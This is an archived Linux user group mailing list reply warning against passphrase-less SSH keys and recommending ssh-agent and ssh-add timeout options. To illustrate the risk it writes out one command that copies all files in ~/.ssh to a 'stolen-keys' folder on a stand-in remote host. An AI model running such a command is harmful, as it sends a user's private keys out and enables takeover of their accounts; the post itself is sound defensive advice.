Mailing List Archive


[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [tlug] Problems with scp anyone knows?



>>>>> "Scott" == Scott  <scottro@example.com> writes:

    Scott> It'll ask for a password you hit enter to leave password
    Scott> blank.  It'll ask for confirmation.

Bad idea.  This is even worse than leaving a key in a little magnetic
box stuck under your car's bumper, since it's trivial to do

scp ~/.ssh/* 'craven@example.com:~/stolen-keys/'

and the cracker can use your id without ever leaving the comfort of
home.  Use a password, and then

$ eval `ssh-agent`
$ ssh-add

Most modern distros will automatically run ssh-agent for you when you
log in or start an X session.  If not, just put the above in the
relevant rc files.

    Scott> I only use this on a few boxes where I'm going back and
    Scott> forth on an internal network and have no idea if there are
    Scott> major security implications with this method.

Now you know.  Unless physical security is _very_ good on that box
(ie, start by installing a coffee maker and a urinal, so you never
have to leave it), your network security is near zero, and that's a
permanent loss once it happens.

Even with the ssh-agent, if you have to leave your box unattended for
more than 60 seconds at a time or so, see the man page for ssh-add,
specifically options -D, -x, and -t.

If you use PGP/GPG as well, there's something out there called
"quintuple-agent" or something like that which will manage all your
private keys and knows how to deal with all the different protocols.

-- 
Institute of Policy and Planning Sciences     http://turnbull.sk.tsukuba.ac.jp
University of Tsukuba                    Tennodai 1-1-1 Tsukuba 305-8573 JAPAN
               Ask not how you can "do" free software business;
              ask what your business can "do for" free software.


Home | Main Index | Thread Index

Home Page Mailing List Linux and Japan TLUG Members Links